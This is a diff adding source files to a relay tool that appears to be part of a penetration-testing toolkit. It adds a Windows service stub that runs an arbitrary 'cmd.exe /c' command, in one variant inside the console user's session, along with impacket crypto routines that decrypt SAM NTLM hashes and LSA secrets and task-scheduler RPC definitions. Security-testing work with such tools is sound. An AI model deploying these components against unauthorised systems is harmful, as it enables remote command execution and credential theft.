+void WINAPI ServiceMain(DWORD argc, LPWSTR *argv)
+{
+	STARTUPINFO si = {0};
+	PROCESS_INFORMATION pi;
+	PWCHAR arguments;
+	DWORD size;
+	HANDLE hUser;
+	LPVOID env;
+	si.cb = sizeof(STARTUPINFO);
+	if(m_ServiceStatusHandle = RegisterServiceCtrlHandler(PYRSVC_NAME, ServiceCtrlHandler))
+	{
+		m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+		m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
+		m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+
+		size = ((ARRAYSIZE(PYRSVC_PRE_CMD) - 1) + lstrlen(z_cmdLine) + (ARRAYSIZE(PYRSVC_POST_CMD) - 1) + lstrlen(z_logFile) + (ARRAYSIZE(PYRSVC_END_CMD) - 1) + 1) * sizeof(WCHAR);
+		if(arguments = (PWCHAR) malloc(size))
+		{
+			memset(arguments, '\0', size);
+			wcscat_s(arguments, size, PYRSVC_PRE_CMD);
+			wcscat_s(arguments, size, z_cmdLine);
+			wcscat_s(arguments, size, PYRSVC_POST_CMD);
+			wcscat_s(arguments, size, z_logFile);
+			wcscat_s(arguments, size, PYRSVC_END_CMD);
+			if(WTSQueryUserToken(WTSGetActiveConsoleSessionId(), &hUser))
+			{
+				if(CreateEnvironmentBlock(&env, hUser, FALSE))
+				{
+					if(CreateProcessAsUser(hUser, NULL, arguments, NULL, NULL, FALSE, CREATE_NO_WINDOW | CREATE_UNICODE_ENVIRONMENT, NULL, NULL, &si, &pi))
+					{
+						CloseHandle(pi.hThread);
+						CloseHandle(pi.hProcess);
+					}
+					DestroyEnvironmentBlock(env);
+				}
+				CloseHandle(hUser);
+			}
+			free(arguments);
+		}
+		WaitForSingleObject(m_pyrsvcRunning, INFINITE);
+		m_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+	}
+}
+
+void WINAPI ServiceCtrlHandler(DWORD Opcode)
+{
+	if((Opcode == SERVICE_CONTROL_STOP) || (Opcode == SERVICE_CONTROL_SHUTDOWN))
+	{
+		m_ServiceStatus.dwCurrentState = SERVICE_STOP_PENDING;
+		SetServiceStatus (m_ServiceStatusHandle, &m_ServiceStatus);
+		SetEvent(m_pyrsvcRunning);
+	}
+}

tools/MultiRelay/bin/Syssvc.c

@@ -0,0 +1,90 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include <windows.h>
+
+int wmain(int argc, wchar_t * argv[]);
+void WINAPI ServiceMain(DWORD argc, LPWSTR *argv);
+void WINAPI ServiceCtrlHandler(DWORD Opcode);
+
+SERVICE_STATUS m_ServiceStatus = {SERVICE_WIN32_OWN_PROCESS, SERVICE_STOPPED, 0, NO_ERROR, 0, 0, 0};
+SERVICE_STATUS_HANDLE m_ServiceStatusHandle = NULL;
+HANDLE m_pyrsvcRunning;
+PWCHAR z_cmdLine, z_logFile;
+const WCHAR PYRSVC_NAME[] = L"pyrsvc", PYRSVC_PRE_CMD[] = L"cmd.exe /c \"", PYRSVC_POST_CMD[] = L"\" > ", PYRSVC_END_CMD[] = L" 2>&1";
+
+int wmain(int argc, wchar_t * argv[])
+{
+	int status = ERROR_SERVICE_NOT_IN_EXE;
+	const SERVICE_TABLE_ENTRY DispatchTable[]= {{(LPWSTR) PYRSVC_NAME, ServiceMain}, {NULL, NULL}};
+	if(argc == 3)
+	{
+		if(z_cmdLine = _wcsdup(argv[1]))
+		{
+			if(z_logFile = _wcsdup(argv[2]))
+			{
+				if(m_pyrsvcRunning = CreateEvent(NULL, TRUE, FALSE, NULL))
+				{
+					if(StartServiceCtrlDispatcher(DispatchTable))
+						status = ERROR_SUCCESS;
+					else status = GetLastError();
+					CloseHandle(m_pyrsvcRunning);
+				}
+				free(z_logFile);
+			}
+			free(z_cmdLine);
+		}
+	}
+	return status;
+}
+
+void WINAPI ServiceMain(DWORD argc, LPWSTR *argv)
+{
+	STARTUPINFO si = {0};
+	PROCESS_INFORMATION pi;
+	PWCHAR arguments;
+	DWORD size;
+	si.cb = sizeof(STARTUPINFO);
+	if(m_ServiceStatusHandle = RegisterServiceCtrlHandler(PYRSVC_NAME, ServiceCtrlHandler))
+	{
+		m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+		m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
+		m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+
+		size = ((ARRAYSIZE(PYRSVC_PRE_CMD) - 1) + lstrlen(z_cmdLine) + (ARRAYSIZE(PYRSVC_POST_CMD) - 1) + lstrlen(z_logFile) + (ARRAYSIZE(PYRSVC_END_CMD) - 1) + 1) * sizeof(WCHAR);
+		if(arguments = (PWCHAR) malloc(size))
+		{
+			memset(arguments, '\0', size);
+			wcscat_s(arguments, size, PYRSVC_PRE_CMD);
+			wcscat_s(arguments, size, z_cmdLine);
+			wcscat_s(arguments, size, PYRSVC_POST_CMD);
+			wcscat_s(arguments, size, z_logFile);
+			wcscat_s(arguments, size, PYRSVC_END_CMD);
+
+			if(CreateProcess(NULL, arguments, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi))
+			{
+				CloseHandle(pi.hThread);
+				CloseHandle(pi.hProcess);
+			}
+
+			free(arguments);
+		}
+		WaitForSingleObject(m_pyrsvcRunning, INFINITE);
+		m_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+	}
+}
+
+void WINAPI ServiceCtrlHandler(DWORD Opcode)
+{
+	if((Opcode == SERVICE_CONTROL_STOP) || (Opcode == SERVICE_CONTROL_SHUTDOWN))
+	{
+		m_ServiceStatus.dwCurrentState = SERVICE_STOP_PENDING;
+		SetServiceStatus (m_ServiceStatusHandle, &m_ServiceStatus);
+		SetEvent(m_pyrsvcRunning);
+	}
+}

tools/MultiRelay/impacket-dev/LICENSE

@@ -0,0 +1,84 @@
+Licencing
+---------
+
+We provide this software under a slightly modified version of the
+Apache Software License. The only changes to the document were the
+replacement of "Apache" with "Impacket" and "Apache Software Foundation"
+with "SecureAuth Corporation". Feel free to compare the resulting
+document to the official Apache license.
+
+The `Apache Software License' is an Open Source Initiative Approved
+License.
+
+
+The Apache Software License, Version 1.1
+Modifications by SecureAuth Corporation (see above)
+
+Copyright (c) 2000 The Apache Software Foundation.  All rights
+reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions
+are met:
+
+1. Redistributions of source code must retain the above copyright
+   notice, this list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright
+   notice, this list of conditions and the following disclaimer in
+   the documentation and/or other materials provided with the
+   distribution.
+
+3. The end-user documentation included with the redistribution,
+   if any, must include the following acknowledgment:
+      "This product includes software developed by
+       SecureAuth Corporation (https://www.secureauth.com/)."
+   Alternately, this acknowledgment may appear in the software itself,
+   if and wherever such third-party acknowledgments normally appear.
+
+4. The names "Impacket", "SecureAuth Corporation" must
+   not be used to endorse or promote products derived from this
+   software without prior written permission. For written
+   permission, please contact oss@secureauth.com.
+
+5. Products derived from this software may not be called "Impacket",
+   nor may "Impacket" appear in their name, without prior written
+   permission of SecureAuth Corporation.
+
+THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
+WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
+OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED.  IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR
+ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
+USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
+OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+SUCH DAMAGE.
+
+
+
+Smb.py and nmb.py are based on Pysmb by Michael Teo
+(https://miketeo.net/projects/pysmb/), and are distributed under the
+following license:
+
+This software is provided 'as-is', without any express or implied
+warranty.  In no event will the author be held liable for any damages
+arising from the use of this software.
+
+Permission is granted to anyone to use this software for any purpose,
+including commercial applications, and to alter it and redistribute it
+freely, subject to the following restrictions:
+
+1. The origin of this software must not be misrepresented; you must
+   not claim that you wrote the original software. If you use this
+   software in a product, an acknowledgment in the product
+   documentation would be appreciated but is not required.
+
+2. Altered source versions must be plainly marked as such, and must
+   not be misrepresented as being the original software.
+
+3. This notice cannot be removed or altered from any source
+   distribution.

tools/MultiRelay/impacket-dev/impacket/__init__.py

@@ -0,0 +1,25 @@
+# Copyright (c) 2003-2016 CORE Security Technologies
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+
+# Set default logging handler to avoid "No handler found" warnings.
+import logging
+try:  # Python 2.7+
+    from logging import NullHandler
+except ImportError:
+    class NullHandler(logging.Handler):
+        def emit(self, record):
+            pass
+
+# All modules inside this library MUST use this logger (impacket)
+# It is up to the library consumer to do whatever is wanted 
+# with the logger output. By default it is forwarded to the 
+# upstream logger
+
+LOG = logging.getLogger(__name__)
+LOG.addHandler(NullHandler())

tools/MultiRelay/impacket-dev/impacket/crypto.py

@@ -0,0 +1,346 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (beto@coresecurity.com)
+#
+# Description:
+#   RFC 4493 implementation (https://www.ietf.org/rfc/rfc4493.txt)
+#   RFC 4615 implementation (https://www.ietf.org/rfc/rfc4615.txt)
+#
+#   NIST SP 800-108 Section 5.1, with PRF HMAC-SHA256 implementation
+#   (https://tools.ietf.org/html/draft-irtf-cfrg-kdf-uses-00#ref-SP800-108)
+#
+#   [MS-LSAD] Section 5.1.2
+#   [MS-SAMR] Section 2.2.11.1.1
+
+from __future__ import division
+from __future__ import print_function
+from impacket import LOG
+try:
+    from Cryptodome.Cipher import DES, AES
+except Exception:
+    LOG.error("Warning: You don't have any crypto installed. You need pycryptodomex")
+    LOG.error("See https://pypi.org/project/pycryptodomex/")
+from struct import pack, unpack
+from impacket.structure import Structure
+import hmac, hashlib
+from six import b
+
+def Generate_Subkey(K):
+
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                    Algorithm Generate_Subkey                      +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                                                                   +
+#   +   Input    : K (128-bit key)                                      +
+#   +   Output   : K1 (128-bit first subkey)                            +
+#   +              K2 (128-bit second subkey)                           +
+#   +-------------------------------------------------------------------+
+#   +                                                                   +
+#   +   Constants: const_Zero is 0x00000000000000000000000000000000     +
+#   +              const_Rb   is 0x00000000000000000000000000000087     +
+#   +   Variables: L          for output of AES-128 applied to 0^128    +
+#   +                                                                   +
+#   +   Step 1.  L := AES-128(K, const_Zero);                           +
+#   +   Step 2.  if MSB(L) is equal to 0                                +
+#   +            then    K1 := L << 1;                                  +
+#   +            else    K1 := (L << 1) XOR const_Rb;                   +
+#   +   Step 3.  if MSB(K1) is equal to 0                               +
+#   +            then    K2 := K1 << 1;                                 +
+#   +            else    K2 := (K1 << 1) XOR const_Rb;                  +
+#   +   Step 4.  return K1, K2;                                         +
+#   +                                                                   +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+    AES_128 = AES.new(K, AES.MODE_ECB)
+
+    L = AES_128.encrypt(bytes(bytearray(16)))
+
+    LHigh = unpack('>Q',L[:8])[0]
+    LLow  = unpack('>Q',L[8:])[0]
+
+    K1High = ((LHigh << 1) | ( LLow >> 63 )) & 0xFFFFFFFFFFFFFFFF
+    K1Low  = (LLow << 1) & 0xFFFFFFFFFFFFFFFF
+
+    if (LHigh >> 63):
+        K1Low ^= 0x87
+
+    K2High = ((K1High << 1) | (K1Low >> 63)) & 0xFFFFFFFFFFFFFFFF
+    K2Low  = ((K1Low << 1)) & 0xFFFFFFFFFFFFFFFF
+
+    if (K1High >> 63):
+        K2Low ^= 0x87
+
+    K1 = bytearray(pack('>QQ', K1High, K1Low))
+    K2 = bytearray(pack('>QQ', K2High, K2Low))
+
+    return K1, K2
+
+def XOR_128(N1,N2):
+
+    J = bytearray()
+    for i in range(len(N1)):
+        #J.append(indexbytes(N1,i) ^ indexbytes(N2,i))
+        J.append(N1[i] ^ N2[i])
+    return J
+
+def PAD(N):
+    padLen = 16-len(N)
+    return  N + b'\x80' + b'\x00'*(padLen-1)
+
+def AES_CMAC(K, M, length):
+
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                   Algorithm AES-CMAC                              +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                                                                   +
+#   +   Input    : K    ( 128-bit key )                                 +
+#   +            : M    ( message to be authenticated )                 +
+#   +            : len  ( length of the message in octets )             +
+#   +   Output   : T    ( message authentication code )                 +
+#   +                                                                   +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +   Constants: const_Zero is 0x00000000000000000000000000000000     +
+#   +              const_Bsize is 16                                    +
+#   +                                                                   +
+#   +   Variables: K1, K2 for 128-bit subkeys                           +
+#   +              M_i is the i-th block (i=1..ceil(len/const_Bsize))   +
+#   +              M_last is the last block xor-ed with K1 or K2        +
+#   +              n      for number of blocks to be processed          +
+#   +              r      for number of octets of last block            +
+#   +              flag   for denoting if last block is complete or not +
+#   +                                                                   +
+#   +   Step 1.  (K1,K2) := Generate_Subkey(K);                         +
+#   +   Step 2.  n := ceil(len/const_Bsize);                            +
+#   +   Step 3.  if n = 0                                               +
+#   +            then                                                   +
+#   +                 n := 1;                                           +
+#   +                 flag := false;                                    +
+#   +            else                                                   +
+#   +                 if len mod const_Bsize is 0                       +
+#   +                 then flag := true;                                +
+#   +                 else flag := false;                               +
+#   +                                                                   +
+#   +   Step 4.  if flag is true                                        +
+#   +            then M_last := M_n XOR K1;                             +
+#   +            else M_last := padding(M_n) XOR K2;                    +
+#   +   Step 5.  X := const_Zero;                                       +
+#   +   Step 6.  for i := 1 to n-1 do                                   +
+#   +                begin                                              +
+#   +                  Y := X XOR M_i;                                  +
+#   +                  X := AES-128(K,Y);                               +
+#   +                end                                                +
+#   +            Y := M_last XOR X;                                     +
+#   +            T := AES-128(K,Y);                                     +
+#   +   Step 7.  return T;                                              +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+    const_Bsize = 16
+    const_Zero  = bytearray(16)
+
+    AES_128= AES.new(K, AES.MODE_ECB)
+    M      = bytearray(M[:length])
+    K1, K2 = Generate_Subkey(K)
+    n      = len(M)//const_Bsize
+
+    if n == 0:
+        n = 1
+        flag = False
+    else:
+        if (length % const_Bsize) == 0:
+            flag = True
+        else:
+            n += 1
+            flag = False
+
+    M_n = M[(n-1)*const_Bsize:]
+    if flag is True:
+        M_last = XOR_128(M_n,K1)
+    else:
+        M_last = XOR_128(PAD(M_n),K2)
+
+    X = const_Zero
+    for i in range(n-1):
+        M_i = M[(i)*const_Bsize:][:16]
+        Y   = XOR_128(X, M_i)
+        X   = bytearray(AES_128.encrypt(bytes(Y)))
+    Y = XOR_128(M_last, X)
+    T = AES_128.encrypt(bytes(Y))
+
+    return T
+
+def AES_CMAC_PRF_128(VK, M, VKlen, Mlen):
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                        AES-CMAC-PRF-128                           +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                                                                   +
+#   + Input  : VK (Variable-length key)                                 +
+#   +        : M (Message, i.e., the input data of the PRF)             +
+#   +        : VKlen (length of VK in octets)                           +
+#   +        : len (length of M in octets)                              +
+#   + Output : PRV (128-bit Pseudo-Random Variable)                     +
+#   +                                                                   +
+#   +-------------------------------------------------------------------+
+#   + Variable: K (128-bit key for AES-CMAC)                            +
+#   +                                                                   +
+#   + Step 1.   If VKlen is equal to 16                                 +
+#   + Step 1a.  then                                                    +
+#   +               K := VK;                                            +
+#   + Step 1b.  else                                                    +
+#   +               K := AES-CMAC(0^128, VK, VKlen);                    +
+#   + Step 2.   PRV := AES-CMAC(K, M, len);                             +
+#   +           return PRV;                                             +
+#   +                                                                   +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+    if VKlen == 16:
+        K = VK
+    else:
+        K = AES_CMAC(bytes(bytearray(16)), VK, VKlen)
+
+    PRV = AES_CMAC(K, M, Mlen)
+
+    return PRV
+
+def KDF_CounterMode(KI, Label, Context, L):
+# Implements NIST SP 800-108 Section 5.1, with PRF HMAC-SHA256
+# https://tools.ietf.org/html/draft-irtf-cfrg-kdf-uses-00#ref-SP800-108
+# Fixed values:
+#  1. h - The length of the output of the PRF in bits, and
+#  2. r - The length of the binary representation of the counter i.
+# Input: KI, Label, Context, and L.
+# Process:
+#  1. n := [L/h]
+#  2. If n > 2r-1, then indicate an error and stop.
+#  3. result(0):= empty .
+#  4. For i = 1 to n, do
+#    a. K(i) := PRF (KI, [i]2 || Label || 0x00 || Context || [L]2)
+#    b. result(i) := result(i-1) || K(i).
+#  5. Return: KO := the leftmost L bits of result(n).
+    h = 256
+    r = 32
+
+    n = L // h
+
+    if n == 0:
+        n = 1
+
+    if n > (pow(2,r)-1):
+        raise Exception("Error computing KDF_CounterMode")
+
+    result = b''
+    K      = b''
+
+    for i in range(1,n+1):
+       input = pack('>L', i) + Label + b'\x00' + Context + pack('>L',L)
+       K = hmac.new(KI, input, hashlib.sha256).digest()
+       result = result + K
+
+    return result[:(L//8)]
+
+# [MS-LSAD] Section 5.1.2 / 5.1.3
+class LSA_SECRET_XP(Structure):
+    structure = (
+        ('Length','<L=0'),
+        ('Version','<L=0'),
+        ('_Secret','_-Secret', 'self["Length"]'),
+        ('Secret', ':'),
+    )
+
+
+def transformKey(InputKey):
+    # Section 5.1.3
+    OutputKey = []
+    OutputKey.append( chr(ord(InputKey[0:1]) >> 0x01) )
+    OutputKey.append( chr(((ord(InputKey[0:1])&0x01)<<6) | (ord(InputKey[1:2])>>2)) )
+    OutputKey.append( chr(((ord(InputKey[1:2])&0x03)<<5) | (ord(InputKey[2:3])>>3)) )
+    OutputKey.append( chr(((ord(InputKey[2:3])&0x07)<<4) | (ord(InputKey[3:4])>>4)) )
+    OutputKey.append( chr(((ord(InputKey[3:4])&0x0F)<<3) | (ord(InputKey[4:5])>>5)) )
+    OutputKey.append( chr(((ord(InputKey[4:5])&0x1F)<<2) | (ord(InputKey[5:6])>>6)) )
+    OutputKey.append( chr(((ord(InputKey[5:6])&0x3F)<<1) | (ord(InputKey[6:7])>>7)) )
+    OutputKey.append( chr(ord(InputKey[6:7]) & 0x7F) )
+
+    for i in range(8):
+        OutputKey[i] = chr((ord(OutputKey[i]) << 1) & 0xfe)
+
+    return b("".join(OutputKey))
+
+def decryptSecret(key, value):
+    # [MS-LSAD] Section 5.1.2
+    plainText = b''
+    key0 = key
+    for i in range(0, len(value), 8):
+        cipherText = value[:8]
+        tmpStrKey = key0[:7]
+        tmpKey = transformKey(tmpStrKey)
+        Crypt1 = DES.new(tmpKey, DES.MODE_ECB)
+        plainText += Crypt1.decrypt(cipherText)
+        key0 = key0[7:]
+        value = value[8:]
+        # AdvanceKey
+        if len(key0) < 7:
+            key0 = key[len(key0):]
+
+    secret = LSA_SECRET_XP(plainText)
+    return (secret['Secret'])
+
+def encryptSecret(key, value):
+    # [MS-LSAD] Section 5.1.2
+    cipherText = b''
+    key0 = key
+    value0 = pack('<LL', len(value), 1) + value
+    for i in range(0, len(value0), 8):
+        if len(value0) < 8:
+            value0 = value0 + b'\x00'*(8-len(value0))
+        plainText = value0[:8]
+        tmpStrKey = key0[:7]
+        print(type(tmpStrKey))
+        print(tmpStrKey)
+        tmpKey = transformKey(tmpStrKey)
+        Crypt1 = DES.new(tmpKey, DES.MODE_ECB)
+        cipherText += Crypt1.encrypt(plainText)
+        key0 = key0[7:]
+        value0 = value0[8:]
+        # AdvanceKey
+        if len(key0) < 7:
+            key0 = key[len(key0):]
+
+    return cipherText
+
+def SamDecryptNTLMHash(encryptedHash, key):
+    # [MS-SAMR] Section 2.2.11.1.1
+    Block1 = encryptedHash[:8]
+    Block2 = encryptedHash[8:]
+
+    Key1 = key[:7]
+    Key1 = transformKey(Key1)
+    Key2 = key[7:14]
+    Key2 = transformKey(Key2)
+
+    Crypt1 = DES.new(Key1, DES.MODE_ECB)
+    Crypt2 = DES.new(Key2, DES.MODE_ECB)
+
+    plain1 = Crypt1.decrypt(Block1)
+    plain2 = Crypt2.decrypt(Block2)
+
+    return plain1 + plain2
+
+def SamEncryptNTLMHash(encryptedHash, key):
+    # [MS-SAMR] Section 2.2.11.1.1
+    Block1 = encryptedHash[:8]
+    Block2 = encryptedHash[8:]
+
+    Key1 = key[:7]
+    Key1 = transformKey(Key1)
+    Key2 = key[7:14]
+    Key2 = transformKey(Key2)
+
+    Crypt1 = DES.new(Key1, DES.MODE_ECB)
+    Crypt2 = DES.new(Key2, DES.MODE_ECB)
+
+    plain1 = Crypt1.encrypt(Block1)
+    plain2 = Crypt2.encrypt(Block2)
+
+    return plain1 + plain2

tools/MultiRelay/impacket-dev/impacket/dcerpc/__init__.py

@@ -0,0 +1 @@
+pass

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/__init__.py

@@ -0,0 +1 @@
+pass

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/atsvc.py

@@ -0,0 +1,211 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-TSCH] ATSVC Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, UCHAR, ULONG, LPDWORD, NULL
+from impacket import hresult_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_ATSVC  = uuidtup_to_bin(('1FF70682-0A51-30E8-076D-740BE8CEE98B','1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+            return 'TSCH SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'TSCH SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+ATSVC_HANDLE = LPWSTR
+# 2.3.1 Constant Values
+CNLEN = 15
+DNLEN = CNLEN
+UNLEN = 256
+MAX_BUFFER_SIZE = (DNLEN+UNLEN+1+1)
+
+# 2.3.7 Flags
+TASK_FLAG_INTERACTIVE                  = 0x1
+TASK_FLAG_DELETE_WHEN_DONE             = 0x2
+TASK_FLAG_DISABLED                     = 0x4
+TASK_FLAG_START_ONLY_IF_IDLE           = 0x10
+TASK_FLAG_KILL_ON_IDLE_END             = 0x20
+TASK_FLAG_DONT_START_IF_ON_BATTERIES   = 0x40
+TASK_FLAG_KILL_IF_GOING_ON_BATTERIES   = 0x80
+TASK_FLAG_RUN_ONLY_IF_DOCKED           = 0x100
+TASK_FLAG_HIDDEN                       = 0x200
+TASK_FLAG_RUN_IF_CONNECTED_TO_INTERNET = 0x400
+TASK_FLAG_RESTART_ON_IDLE_RESUME       = 0x800
+TASK_FLAG_SYSTEM_REQUIRED              = 0x1000
+TASK_FLAG_RUN_ONLY_IF_LOGGED_ON        = 0x2000
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.3.4 AT_INFO
+class AT_INFO(NDRSTRUCT):
+    structure =  (
+        ('JobTime',DWORD),
+        ('DaysOfMonth',DWORD),
+        ('DaysOfWeek',UCHAR),
+        ('Flags',UCHAR),
+        ('Command',LPWSTR),
+    )
+
+class LPAT_INFO(NDRPOINTER):
+    referent = (
+        ('Data',AT_INFO),
+    )
+
+# 2.3.6 AT_ENUM
+class AT_ENUM(NDRSTRUCT):
+    structure =  (
+        ('JobId',DWORD),
+        ('JobTime',DWORD),
+        ('DaysOfMonth',DWORD),
+        ('DaysOfWeek',UCHAR),
+        ('Flags',UCHAR),
+        ('Command',LPWSTR),
+    )
+
+class AT_ENUM_ARRAY(NDRUniConformantArray):
+    item = AT_ENUM
+
+class LPAT_ENUM_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',AT_ENUM_ARRAY),
+    )
+
+# 2.3.5 AT_ENUM_CONTAINER
+class AT_ENUM_CONTAINER(NDRSTRUCT):
+    structure =  (
+        ('EntriesRead',DWORD),
+        ('Buffer',LPAT_ENUM_ARRAY),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.2.5.2.1 NetrJobAdd (Opnum 0)
+class NetrJobAdd(NDRCALL):
+    opnum = 0
+    structure = (
+        ('ServerName',ATSVC_HANDLE),
+        ('pAtInfo', AT_INFO),
+    )
+
+class NetrJobAddResponse(NDRCALL):
+    structure = (
+        ('pJobId',DWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.2.2 NetrJobDel (Opnum 1)
+class NetrJobDel(NDRCALL):
+    opnum = 1
+    structure = (
+        ('ServerName',ATSVC_HANDLE),
+        ('MinJobId', DWORD),
+        ('MaxJobId', DWORD),
+    )
+
+class NetrJobDelResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.2.3 NetrJobEnum (Opnum 2)
+class NetrJobEnum(NDRCALL):
+    opnum = 2
+    structure = (
+        ('ServerName',ATSVC_HANDLE),
+        ('pEnumContainer', AT_ENUM_CONTAINER),
+        ('PreferedMaximumLength', DWORD),
+        ('pResumeHandle', DWORD),
+    )
+
+class NetrJobEnumResponse(NDRCALL):
+    structure = (
+        ('pEnumContainer', AT_ENUM_CONTAINER),
+        ('pTotalEntries', DWORD),
+        ('pResumeHandle',LPDWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.2.4 NetrJobGetInfo (Opnum 3)
+class NetrJobGetInfo(NDRCALL):
+    opnum = 3
+    structure = (
+        ('ServerName',ATSVC_HANDLE),
+        ('JobId', DWORD),
+    )
+
+class NetrJobGetInfoResponse(NDRCALL):
+    structure = (
+        ('ppAtInfo', LPAT_INFO),
+        ('ErrorCode',ULONG),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (NetrJobAdd,NetrJobAddResponse ),
+ 1 : (NetrJobDel,NetrJobDelResponse ),
+ 2 : (NetrJobEnum,NetrJobEnumResponse ),
+ 3 : (NetrJobGetInfo,NetrJobGetInfoResponse ),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hNetrJobAdd(dce, serverName = NULL, atInfo = NULL):
+    netrJobAdd = NetrJobAdd()
+    netrJobAdd['ServerName'] = serverName
+    netrJobAdd['pAtInfo'] = atInfo
+    return dce.request(netrJobAdd)
+
+def hNetrJobDel(dce, serverName = NULL, minJobId = 0, maxJobId = 0):
+    netrJobDel = NetrJobDel()
+    netrJobDel['ServerName'] = serverName
+    netrJobDel['MinJobId'] = minJobId
+    netrJobDel['MaxJobId'] = maxJobId
+    return dce.request(netrJobDel)
+
+def hNetrJobEnum(dce, serverName = NULL, pEnumContainer = NULL, preferedMaximumLength = 0xffffffff):
+    netrJobEnum = NetrJobEnum()
+    netrJobEnum['ServerName'] = serverName
+    netrJobEnum['pEnumContainer']['Buffer'] = pEnumContainer
+    netrJobEnum['PreferedMaximumLength'] = preferedMaximumLength
+    return dce.request(netrJobEnum)
+
+def hNetrJobGetInfo(dce, serverName = NULL, jobId = 0):
+    netrJobGetInfo = NetrJobGetInfo()
+    netrJobGetInfo['ServerName'] = serverName
+    netrJobGetInfo['JobId'] = jobId
+    return dce.request(netrJobGetInfo)

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/bkrp.py

@@ -0,0 +1,127 @@
